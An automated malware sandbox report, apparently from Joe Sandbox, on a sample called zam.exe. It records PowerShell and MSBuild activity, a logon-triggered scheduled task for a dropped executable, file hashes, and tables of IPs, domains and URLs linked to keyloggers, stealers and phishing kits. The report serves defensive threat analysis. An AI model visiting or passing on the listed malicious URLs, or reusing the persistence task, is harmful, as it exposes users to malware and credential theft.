Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, e16604.g.akamaiedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Execution Graph export aborted for target MSBuild.exe, PID 5892 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: zam.exe

Simulations

Behavior and APIs

Time	Type	Description
10:15:20	API Interceptor	1x Sleep call for process: zam.exe modified
10:15:22	API Interceptor	30x Sleep call for process: powershell.exe modified
10:15:24	API Interceptor	13614443x Sleep call for process: MSBuild.exe modified
10:15:25	API Interceptor	1x Sleep call for process: HaNkyQWPIIzrnC.exe modified
16:15:22	Task Scheduler	Run new task: HaNkyQWPIIzrnC path: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	Ordine R04-T4077 TBA-2024.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	paste.ee/d/EyFwK
	aesM8nmCM2.exe	Get hash	malicious	Unknown	Browse	start7345724.ru/new/net_api
	RO2Y11yOJ7.exe	Get hash	malicious	FormBook	Browse	www.lnnn.fun/u5w9/
	ByuoedHi2e.exe	Get hash	malicious	FormBook	Browse	www.rihanaroly.sbs/othk/
	Aviso de pago.xla.xlsx	Get hash	malicious	HTMLPhisher	Browse	paste.ee/d/PAg0l
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/8shpYIj5/download
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/CXujY04Y/download
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/O2nyeCCn/download
	2rI5YEg7uo.exe	Get hash	malicious	FormBook	Browse	www.evoolixyppuk.shop/7gfa/?pP=OC/NqFuXSoQKcxJzIwbC8gc6YWk63HA88JkIsR5MBtbsuoT1qNc3mE+usci2f4e+0fIXV/Px1LgbGc4SbpFIftMOxDoszWQURSPAVqq521dqxxqHUw==&UJO=A6MH4FUp
	createdbestthingswithgoodnewswithgreatfriendship.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher	Browse	paste.ee/d/PAg0l
158.101.44.242	Pedido de Cota#U00e7#U00e3o-241107.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Ordine R04-T4077 TBA-2024.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	ZF3dxapdNLa4lNL.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Q7oJsypKoV.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	z1NewPO.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	BG115Q39cY.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Nowe zam.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Fiyat teklifi iste#U011fi.bat.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	fatura.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	MJ5bO7kS7j.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	7DqFctwwsk.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	kChWJJNUHz.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.BackDoor.AgentTeslaNET.37.10515.30521.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Pedido de Cota#U00e7#U00e3o-241107.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Documento de env#U00edo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Ordine R04-T4077 TBA-2024.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Pedido de Cota#U00e7#U00e3o-241107_Pdf.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	RFQ 4748.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
checkip.dyndns.com	fatura.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	MJ5bO7kS7j.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	7DqFctwwsk.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	kChWJJNUHz.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	SecuriteInfo.com.BackDoor.AgentTeslaNET.37.10515.30521.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	Pedido de Cota#U00e7#U00e3o-241107.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Documento de env#U00edo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	Ordine R04-T4077 TBA-2024.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Pedido de Cota#U00e7#U00e3o-241107_Pdf.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	RFQ 4748.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
s-part-0017.t-0009.t-msedge.net	file.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	c5Wx38ncnI.dll	Get hash	malicious	Unknown	Browse	13.107.246.45
	7mgU0zRdw3.dll	Get hash	malicious	Unknown	Browse	13.107.246.45
	fWKjW1LbMk.dll	Get hash	malicious	Unknown	Browse	13.107.246.45
	attachDocx.docx	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://gjchristelsodikobehjsg.taplink.ws/	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.246.45
	IcisR4FC8n.dll	Get hash	malicious	Unknown	Browse	13.107.246.45
	zGjrvpdJwg.dll	Get hash	malicious	Unknown	Browse	13.107.246.45
	qQ0LgZSmdN.dll	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://thaykinhgiasoc.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU9USlBZakE9JnVpZD1VU0VSMTcxMDIwMjRVMDAxMDE3NDA=N0123N	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.246.45
bg.microsoft.map.fastly.net	https://thrifty-wombat-mjszmd.mystrikingly.com/	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://bartolomejdolez.samcart.com/products/59056894	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	__Voice_mail_02309_wav___00_15.eml (354 KB).msg	Get hash	malicious	Unknown	Browse	199.232.214.172
	101043499126853499.js	Get hash	malicious	Strela Downloader	Browse	199.232.214.172
	https://appdata.lclouds.pro	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	199.232.210.172
	asegurar.vbs	Get hash	malicious	Remcos	Browse	199.232.210.172
	http://www.fairplay.co.za	Get hash	malicious	Unknown	Browse	199.232.214.172
	CatalogApp.exe	Get hash	malicious	LummaC	Browse	199.232.210.172
	yPSjWvD9LD.dll	Get hash	malicious	BruteRatel, Latrodectus	Browse	199.232.210.172
	3.dll	Get hash	malicious	Unknown	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://wcdownloadercdn.lavasoft.com/8.9.0.1091/WcInstaller.exe	Get hash	malicious	Unknown	Browse	104.16.148.130
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3
	fatura.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	https://docs.google.com/forms/d/e/1FAIpQLScHNAoaCG0Tn9tEMCSjSteNrfFBQkAkIK-eivcxeIQy4nv_MQ/viewform?usp=send_form	Get hash	malicious	Unknown	Browse	188.114.97.3
	attachDocx.docx	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://gjchristelsodikobehjsg.taplink.ws/	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	104.17.25.14
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.96.3
	https://thrifty-wombat-mjszmd.mystrikingly.com/	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://thaykinhgiasoc.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU9USlBZakE9JnVpZD1VU0VSMTcxMDIwMjRVMDAxMDE3NDA=N0123N	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	188.114.97.3
ORACLE-BMC-31898US	kChWJJNUHz.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	SecuriteInfo.com.BackDoor.AgentTeslaNET.37.10515.30521.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	Pedido de Cota#U00e7#U00e3o-241107.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Documento de env#U00edo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	Ordine R04-T4077 TBA-2024.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Pedido de Cota#U00e7#U00e3o-241107_Pdf.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	RFQ 4748.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	Revised Order Copy.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	Fiyat teklifi iste#U011fi.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	PO#940834894039430849484803408.PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
SERVERCENTRALUS	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger	Browse	50.31.176.103
	pedido.pif.exe	Get hash	malicious	Snake Keylogger	Browse	50.31.176.103
	https://link.edgepilot.com/s/e9b35021/KNsrNVGwOUukNjaKm_560w?u=https://publicidadnicaragua.com/	Get hash	malicious	Unknown	Browse	216.246.47.153
	kkkarm7.elf	Get hash	malicious	Unknown	Browse	204.93.205.45
	WIpGif4IRrFfamQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	75.102.58.14
	https://aws.predictiveresponse.net/fwdhs.htm?redirect=https://shermsco.com/umtdby0g5ztccrxs-790065	Get hash	malicious	Unknown	Browse	216.246.112.38
	http://www.tiktokchat.shop/	Get hash	malicious	Unknown	Browse	75.102.49.249
	http://fullgasesspa.cl	Get hash	malicious	Unknown	Browse	216.246.46.105
	hNX3ktCRra.elf	Get hash	malicious	Unknown	Browse	66.225.201.22
	https://choicesfdc.com.au/readm.html?colors=c2FyYS5nZWlnZXJAc2JhZmxhLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	216.246.46.21

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	attachDocx.docx	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://gjchristelsodikobehjsg.taplink.ws/	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.246.45
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	13.107.246.45
	https://thrifty-wombat-mjszmd.mystrikingly.com/	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://bartolomejdolez.samcart.com/products/59056894	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://www.canva.com/design/DAGVsvWsNbI/iZzU0BNPZvRGZSXgumDARw/view?utm_content=DAGVsvWsNbI&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://dse_NA4@docusign.net	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://heptagon-olive-l8hr.squarespace.com	Get hash	malicious	Unknown	Browse	13.107.246.45
	securedoc_20241104T081116.html	Get hash	malicious	Unknown	Browse	13.107.246.45
	#U25b6#Ufe0fVoice_mail_02309_wav0015.html	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.246.45
54328bd36c14bd82ddaa0c04b25ed9ad	fatura.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	MJ5bO7kS7j.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	7DqFctwwsk.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	kChWJJNUHz.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.BackDoor.AgentTeslaNET.37.10515.30521.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Pedido de Cota#U00e7#U00e3o-241107.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Documento de env#U00edo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Pedido de Cota#U00e7#U00e3o-241107_Pdf.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	RFQ 4748.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Revised Order Copy.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3

Process:	C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zam.exe.log

Download File

Process:	C:\Users\user\Desktop\zam.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379401388151058
Encrypted:	false
SSDEEP:	48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZPUyuVws:fLHxvIIwLgZ2KRHWLOugbVws
MD5:	0B4017F125E76F55EAE85EF01D615C8A
SHA1:	74D2FF2E01213220AD36EEF8CA5CD4FC54DFB23F
SHA-256:	13EED02E4D9B3CE0C1B223961DEAFB6D1AE7D91878397420DE1916D4F779925C
SHA-512:	BD7E1EDFB02BCA3A7DB412A8DA17D15F99C6B51F400F8EE195DD45DF9DEB49874CF94160A31BBF08ACC570AEC9973EC568797E00701833521D0C696111DCDFFA
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0k5wbg0b.xlj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b54gxdjo.zto.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_copr2d1e.gqy.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f2acl3lh.0ed.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jaksbiav.nwp.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lfvqp55x.bym.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n2bkhcea.iig.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uzxgyaho.dz0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp8F5A.tmp

Download File

Process:	C:\Users\user\Desktop\zam.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1573
Entropy (8bit):	5.118482168709091
Encrypted:	false
SSDEEP:	48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuT6Iv:He7XQBBYrFdOFzOz6dKrsuh
MD5:	B713FABF8BE2616EA597DA1EA90A4486
SHA1:	0A50A01782BC35D45F5A3B2C9E188C339F498C39
SHA-256:	70EB3AA28DABAE7F6D42FBE7F6051437CE92F1ACC394AE01C43FA2355476EE23
SHA-512:	3CB7131BB2719612AD878268A26884397F4243FB4BE14AB4AC6B0111C825A8C9BFC0210229F855BD423DB266B21C4BE9AA63BB039D035E1EDEE1AFD0A16D1AF3
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

C:\Users\user\AppData\Local\Temp\tmpA208.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe
